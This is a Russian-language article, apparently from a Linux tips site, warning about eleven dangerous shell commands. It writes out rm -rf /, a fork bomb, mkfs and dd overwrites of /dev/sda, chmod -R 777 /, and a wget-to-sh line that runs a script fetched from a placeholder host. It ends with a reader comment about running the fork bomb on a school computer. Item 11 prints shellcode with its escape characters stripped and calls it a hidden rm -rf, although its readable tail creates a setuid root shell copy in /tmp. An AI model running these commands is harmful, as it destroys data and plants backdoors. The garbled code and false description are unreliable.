Интерфейс командной строки — мощная и удобная утилита для администрирования системы Linux. Он обеспечивает быстрый и универсальный способ запуска системы, особенно при управлении безголовыми системами, не имеющими графического интерфейса.
Хотя командная строка полезна для управления вашей системой, она сопряжена с риском. Выполнение неправильных команд может нанести вред и непоправимый ущерб вашей системе. В этом руководстве мы составили список некоторых из самых рискованных команд, которые вам не следует выполнять в вашей системе.
1. rm -rf/ команда
Команда rm — это команда Linux, используемая для удаления файлов и каталогов в зависимости от используемых аргументов. Однако следует соблюдать крайнюю осторожность при использовании команды rm, так как небольшая опечатка или ошибка могут привести к непоправимому повреждению системы.
При выполнении от имени пользователя root с параметром -rf / команда рекурсивно удаляет все файлы и каталоги в вашей системе, начиная с корня (/), который является самым высоким в структуре файловой иерархии Linux. Короче говоря, команда rm -rf / полностью стирает вашу систему, что приводит к поломке и невозможности восстановления системы.
Вот некоторые из параметров, используемых с командой rm.
- Команда rm в Linux используется для удаления файлов.
- Команда rm -r рекурсивно удаляет папку, даже пустую папку.
- Команда rm -f удаляет «Файл только для чтения» без запроса.
- rm -rf / : Принудительно удалить все в корневом каталоге.
- rm -rf * : Принудительно удалить все в текущем каталоге/рабочем каталоге.
- rm -rf . : принудительное удаление текущей папки и подпапок.
На самом деле, когда вы запускаете команду как обычный пользователь, вы получите два предупреждения на терминале.
Чтобы предотвратить случайное удаление файлов командой «rm», создайте псевдоним команды «rm» как «rm -i» в файле «.bashrc», он будет запрашивать подтверждение каждого удаления.
2. :(){:|:&};: команда
Вышеупомянутое на самом деле форк-бомба. Она работает, создавая функцию с именем ‘:’, которая вызывает себя дважды, один раз на переднем плане и один раз в фоновом режиме. Функция выполняется многократно и при этом потребляет все системные ресурсы, что приводит к сбою системы.
На самом деле, команда fork bomb — это, по сути, форма DoS-атаки (отказ в обслуживании). Его также называют вирусом Wabbit или Rabbit. Хуже всего то, что вам не нужно быть root, чтобы запустить эту атаку.
К счастью, вы можете защитить себя от этой атаки, ограничив количество процессов, запускаемых локальными пользователями, примерно до 4000.
Вы можете сделать это, выполнив команду:
$ ulimit -S -u 4000
Позже вы можете проверить это с помощью команды:
$ ulimit -u
3. Команда >/dev/sda
Выполнение команды, за которой следует >/dev/sda, перезаписывает блок /dev/sda на вашем жестком диске. Этот блок содержит данные файловой системы и при перезаписи приводит к необратимому повреждению системы.
4. mv папка /dev/null
Еще одна опасная операция, которую вам не следует выполнять, — это перемещение каталога или файла в /dev/null. Файл /dev/null — это файл особого типа, известный как нулевое устройство или «черная дыра». Все, что перемещается в /dev/null, отбрасывается и уничтожается.
Следующая команда перемещает все содержимое домашнего каталога пользователя в /dev/null, тем самым удаляя все данные, содержащиеся в домашнем каталоге пользователя.
# mv /home/user/* /dev/null
5. wget http://malicious_source -O- | sh
Команда wget — это команда, которая загружает файлы с веб-сервера или файлового сервера. Приведенная выше команда загружает скрипт из вредоносного источника, а затем выполняет его.
6. mkfs.ext3 /dev/sda
Команда mkfs создает новую файловую систему (ext2, ext3, ext4 и т. д.) на отформатированном устройстве хранения, в большинстве случаев на разделе жесткого диска. Выполнение команды mkfs на разделе стирает все хранящиеся в нем данные.
Форматирование всего диска (например, mkfs.ext3 /dev/sda) полезно при форматировании разделов диска, но оно приводит к сбою системы и оставляет ее в невосстановимом состоянии. Это происходит потому, что он уничтожает все системные файлы вместе с вашими личными данными.
Команда также может принимать другие формы, как показано ниже.
# mkfs.ext4 /dev/sda # mkfs.xfs /dev/sda # mkfs.btrfs /dev/sda
7. Команда > файл
> Файл стирает содержимое файла и оставляет его пустым. Это синоним команды cat /dev/null > file. Поэтому следует соблюдать осторожность при использовании операторов перенаправления в системе Linux.
Ниже приведена демонстрация того, как эта команда перезаписывает текстовый файл. Вы можете себе представить катастрофу, которую может вызвать эта команда, если задействованный файл является файлом конфигурации.
8. ^foo^bar
Команда ^foo^bar столь же опасна, сколь и полезна, в зависимости от того, как она выполняется. Хотя это позволяет вам редактировать ранее выполненные команды и выполнять их снова, это может иметь катастрофические последствия, если вы не заинтересованы в изменениях, внесенных в команды перед их запуском.
9. dd if=/dev/random of=/dev/sda
Приведенная выше команда стирает блок /dev/sda и записывает в блок случайные ненужные данные. Ваша система останется на непоследовательной и невосстановимой стадии.
10. Chmod -R 777 /
Хотя это может не привести к немедленному сбою вашей системы Linux, команда chmod -R 777 / рекурсивно назначает все разрешения (чтение, запись и выполнение) всем файлам в вашей системе Linux, начиная с корня.
Это эффективно раскрывает все важные файлы конфигурации и другие файлы для всех пользователей, и это представляет огромную угрозу безопасности для вашей системы. Любой с гнусными намерениями может возиться с важными файлами и легко сломать вашу систему.
11. Скрытая команда
Приведенная ниже команда — это не что иное, как первая команда выше (rm -rf). Здесь коды спрятаны в шестнадцатеричном формате, чтобы несведущий пользователь мог быть обманут. Выполнение приведенного ниже кода в вашем терминале сотрет ваш корневой раздел.
Эта команда здесь показывает, что угроза может быть скрытой и иногда не обнаруживаемой. Вы должны осознавать, что вы делаете и каков будет результат. Не компилируйте/запускайте коды из неизвестного источника.
char esp[] __attribute__ ((section(“.text”))) /* e.s.p release */ = “xebx3ex5bx31xc0x50x54x5ax83xecx64x68″ “xffxffxffxffx68xdfxd0xdfxd9x68x8dx99″ “xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7″ “x56x04xf7x56x08xf7x56x0cx83xc4x74x56″ “x8dx73x08x56x53x54x59xb0x0bxcdx80x31″ “xc0x40xebxf9xe8xbdxffxffxffx2fx62x69″ “x6ex2fx73x68x00x2dx63x00″ “cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;”;
Примечание. Не выполняйте ни одну из вышеперечисленных команд в терминале или оболочке Linux, а также на компьютере друга или школьного компьютера. Если вы хотите протестировать их, запустите их на виртуальной машине.
Любое несоответствие или потеря данных из-за выполнения вышеуказанной команды приведет к поломке вашей системы, за что ни Автор статьи, ни linuxthebest не несут ответственности.
Я форк бомбу проверил на школьном компе и ЗАВИСЛО ВСЁ ЖОСКА
перезагрузили комп вроде норм